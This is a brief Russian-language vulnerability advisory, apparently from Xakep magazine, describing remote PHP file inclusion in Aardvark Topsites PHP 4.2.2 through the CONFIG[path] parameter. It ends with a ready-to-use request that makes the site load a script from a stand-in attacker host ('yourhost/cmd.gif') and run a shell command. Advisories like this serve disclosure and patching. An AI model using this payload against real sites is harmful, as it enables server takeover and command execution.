Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: Aardvark Topsites PHP 4.2.2, возможно другие версии.
Уязвимость позволяет удаленному пользователю выполнить произвольный код на
целевой системе. Уязвимость существует из-за недостаточной обработки входных
данных в параметре "CONFIG[path]" в сценарии sources/lostpw.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольный PHP сценарий на системе с привилегиями Web сервера. Для удачной
эксплуатации уязвимости опция "register_globals" должна быть включена.
Пример:
/sources/join.php?FORM[url]=owned&CONFIG[captcha]= 1&CONFIG[path]=http://yourhost/cmd.gif?cmd=ls